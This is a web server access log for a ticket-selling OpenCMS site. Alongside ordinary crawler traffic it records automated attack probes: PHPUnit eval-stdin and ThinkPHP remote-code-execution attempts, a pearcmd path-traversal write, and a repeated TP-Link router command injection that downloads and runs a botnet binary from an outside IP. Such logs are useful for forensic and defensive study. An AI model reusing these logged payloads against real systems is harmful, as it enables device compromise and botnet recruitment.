103.186.161.60 - - [21/Jun/2024:13:22:53 +0200] "GET /ticket2/opencms/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:53 +0200] "GET /ticket2/opencms/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:54 +0200] "GET /ticket2/opencms/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:54 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:55 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:55 +0200] "GET /ticket2/opencms/lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:55 +0200] "GET /ticket2/opencms/lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:56 +0200] "GET /ticket2/opencms/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:56 +0200] "GET /ticket2/opencms/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:57 +0200] "GET /ticket2/opencms/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:57 +0200] "GET /ticket2/opencms/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:58 +0200] "GET /ticket2/opencms/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:58 +0200] "GET /ticket2/opencms/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:59 +0200] "GET /ticket2/opencms/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:59 +0200] "GET /ticket2/opencms/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:00 +0200] "GET /ticket2/opencms/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:00 +0200] "GET /ticket2/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:01 +0200] "GET /ticket2/opencms/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:01 +0200] "GET /ticket2/opencms/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:01 +0200] "GET /ticket2/opencms/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:02 +0200] "GET /ticket2/opencms/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:02 +0200] "GET /ticket2/opencms/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:03 +0200] "GET /ticket2/opencms/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:03 +0200] "GET /ticket2/opencms/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:04 +0200] "GET /ticket2/opencms/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:04 +0200] "GET /ticket2/opencms/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:05 +0200] "GET /ticket2/opencms/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:05 +0200] "GET /ticket2/opencms/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:06 +0200] "GET /ticket2/opencms/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:06 +0200] "GET /ticket2/opencms/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:07 +0200] "GET /ticket2/opencms/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:07 +0200] "GET /ticket2/opencms/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:08 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:23:08 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - 154.201.87.185 - - [21/Jun/2024:13:34:02 +0200] "GET /manager/html HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:13:47:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:13:47:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:14:07:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 80.82.43.225 - - [21/Jun/2024:14:21:45 +0200] "GET / HTTP/1.1" 404 - 162.216.149.208 - - [21/Jun/2024:14:33:03 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 162.216.149.208 - - [21/Jun/2024:14:33:05 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 40.77.167.45 - - [21/Jun/2024:14:52:59 +0200] "GET /ticket2/opencms/en/venue/?venueid=50DAC20F-40DE-CF88-E5C9-6C2C12662F21 HTTP/1.1" 200 63669 52.228.155.166 - - [21/Jun/2024:15:12:38 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 109.74.199.84 - - [21/Jun/2024:15:13:08 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 109.74.199.84 - - [21/Jun/2024:15:13:09 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 109.74.199.84 - - [21/Jun/2024:15:13:09 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 104.248.35.48 - - [21/Jun/2024:15:19:51 +0200] "GET /v2/_catalog HTTP/1.1" 404 - 185.244.36.206 - - [21/Jun/2024:15:26:43 +0200] "GET / HTTP/1.1" 404 - 40.77.167.126 - - [21/Jun/2024:15:36:27 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/tottenham/ HTTP/1.1" 200 64498 45.148.10.174 - - [21/Jun/2024:15:53:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:15:53:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 104.168.70.165 - - [21/Jun/2024:16:16:17 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:16:20:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 35.216.150.139 - - [21/Jun/2024:16:27:56 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.11.15 - - [21/Jun/2024:16:31:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 141.98.83.197 - - [21/Jun/2024:16:37:39 +0200] "GET / HTTP/1.1" 404 - 51.138.184.110 - - [21/Jun/2024:16:44:26 +0200] "GET / HTTP/1.1" 404 - 185.244.36.206 - - [21/Jun/2024:16:56:20 +0200] "GET / HTTP/1.1" 404 - 87.236.176.40 - - [21/Jun/2024:17:01:33 +0200] "GET / HTTP/1.1" 404 - 83.171.108.239 - - [21/Jun/2024:17:16:27 +0200] "GET / HTTP/1.1" 404 - 83.171.108.239 - - [21/Jun/2024:17:16:28 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 83.171.108.239 - - [21/Jun/2024:17:16:28 +0200] "GET /HNAP1/ HTTP/1.1" 404 - 83.171.108.239 - - [21/Jun/2024:17:16:28 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 83.171.108.239 - - [21/Jun/2024:17:16:29 +0200] "GET /ticket2/opencms/HNAP1/ HTTP/1.1" 404 - 192.168.0.100 - - [21/Jun/2024:17:21:20 +0200] "GET / HTTP/1.1" 404 - 60.190.226.188 - - [21/Jun/2024:17:21:53 +0200] "GET / HTTP/1.0" 404 - 115.238.44.234 - - [21/Jun/2024:17:23:07 +0200] "GET / HTTP/1.0" 404 - 52.228.155.166 - - [21/Jun/2024:17:28:00 +0200] "GET /ticket2/opencms/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:17:40:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:17:40:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 86.142.56.12 - - [21/Jun/2024:17:42:22 +0200] "GET / HTTP/1.1" 404 - 66.249.66.160 - - [21/Jun/2024:17:44:24 +0200] "GET /ticket2/opencms/en/venue/?venueid=2ECF2351-C750-A7A7-654E-B9CAF140FBB1 HTTP/1.1" 200 63654 52.167.144.140 - - [21/Jun/2024:17:49:27 +0200] "GET /ticket2/opencms/en/venue/?countryid=EF4CD3F8-F552-B03A-F63B-5D01B436E59A HTTP/1.1" 200 93013 87.121.69.27 - - [21/Jun/2024:18:29:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 185.244.36.206 - - [21/Jun/2024:18:32:59 +0200] "GET / HTTP/1.1" 404 - 51.138.188.120 - - [21/Jun/2024:18:53:43 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 51.138.188.120 - - [21/Jun/2024:18:53:44 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 66.249.66.161 - - [21/Jun/2024:19:00:28 +0200] "GET /ticket2/opencms/en/venue/?venueid=53EF7D3C-060E-89A6-0542-435CB2DFE1C0 HTTP/1.1" 200 63636 66.249.66.161 - - [21/Jun/2024:19:00:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939 66.249.66.161 - - [21/Jun/2024:19:00:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 66.249.66.161 - - [21/Jun/2024:19:00:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 66.249.66.160 - - [21/Jun/2024:19:19:57 +0200] "GET /ticket2/opencms/en/venue/?venueid=84B906DE-B460-D444-68C7-D7444F9F1F9B HTTP/1.1" 200 63651 66.249.66.161 - - [21/Jun/2024:19:20:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737 178.19.47.16 - - [21/Jun/2024:19:30:39 +0200] "GET / HTTP/1.1" 404 - 170.64.170.221 - - [21/Jun/2024:19:55:40 +0200] "GET / HTTP/1.1" 404 - 170.64.170.221 - - [21/Jun/2024:19:55:41 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:20:00:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 185.244.36.206 - - [21/Jun/2024:20:05:59 +0200] "GET / HTTP/1.1" 404 - 51.8.220.44 - - [21/Jun/2024:20:08:34 +0200] "GET / HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:20:12:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:20:12:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 71.6.134.232 - - [21/Jun/2024:20:22:41 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 198.235.24.8 - - [21/Jun/2024:20:30:42 +0200] "GET /ticket2/opencms/ HTTP/1.1" 500 - 45.148.10.174 - - [21/Jun/2024:20:43:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:20:43:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 141.98.11.15 - - [21/Jun/2024:21:14:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 52.167.144.203 - - [21/Jun/2024:21:30:01 +0200] "GET /ticket2/opencms/en/venue/?venueid=E42DAA3B-8D14-C1C2-324E-BD1238E886E9 HTTP/1.1" 200 63619 87.121.69.27 - - [21/Jun/2024:22:35:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 141.98.83.197 - - [21/Jun/2024:22:39:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:22:39:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:45:38 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 123.58.213.118 - - [21/Jun/2024:22:45:39 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 123.58.213.118 - - [21/Jun/2024:22:45:41 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 123.58.213.118 - - [21/Jun/2024:22:45:41 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 123.58.213.118 - - [21/Jun/2024:22:45:45 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 123.58.213.118 - - [21/Jun/2024:22:45:46 +0200] "GET /ticket2/opencms/en/robots.txt HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:45:46 +0200] "GET /ticket2/opencms/en/sitemap.xml HTTP/1.1" 200 37572 123.58.213.118 - - [21/Jun/2024:22:45:48 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 123.58.213.118 - - [21/Jun/2024:22:45:50 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 123.58.213.118 - - [21/Jun/2024:22:45:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541 123.58.213.118 - - [21/Jun/2024:22:45:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 123.58.213.118 - - [21/Jun/2024:22:45:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338 123.58.213.118 - - [21/Jun/2024:22:45:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 123.58.213.118 - - [21/Jun/2024:22:45:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583 123.58.213.118 - - [21/Jun/2024:22:45:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229 123.58.213.118 - - [21/Jun/2024:22:45:59 +0200] "GET /ticket2/opencms/en/robots.txt HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:45:59 +0200] "GET /ticket2/opencms/en/sitemap.xml HTTP/1.1" 200 37572 123.58.213.118 - - [21/Jun/2024:22:46:03 +0200] "GET /ticket2/opencms/axis2-admin/ HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:46:04 +0200] "GET /ticket2/opencms/axis2/ HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:46:05 +0200] "GET /ticket2/opencms/axis2/axis2-admin/ HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:46:07 +0200] "GET /ticket2/opencms/?id=%25{{{11}}*{{11}}} HTTP/1.1" 302 - 123.58.213.118 - - [21/Jun/2024:22:46:09 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 123.58.213.118 - - [21/Jun/2024:22:46:11 +0200] "GET /ticket2/opencms/struts/webconsole.html HTTP/1.1" 404 - 123.58.213.118 - - [21/Jun/2024:22:46:12 +0200] "GET /ticket2/opencms/?actionErrors=1111 HTTP/1.1" 302 - 123.58.213.118 - - [21/Jun/2024:22:46:15 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 123.58.213.118 - - [21/Jun/2024:22:46:17 +0200] "GET /ticket2/opencms/invoker/readonly HTTP/1.1" 404 - 139.162.177.62 - - [21/Jun/2024:22:56:01 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 40.77.167.33 - - [21/Jun/2024:22:57:05 +0200] "GET /ticket2/opencms/en/venue/?venueid=91672A3F-D5FF-A436-E120-7AA50E9CF3E6 HTTP/1.1" 200 63679 198.235.24.86 - - [21/Jun/2024:22:58:07 +0200] "GET / HTTP/1.1" 404 - 5.188.206.226 - - [21/Jun/2024:23:22:51 +0200] "GET /ticket2/opencms/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 - 80.76.49.133 - - [21/Jun/2024:23:25:50 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 66.249.66.162 - - [21/Jun/2024:23:34:41 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773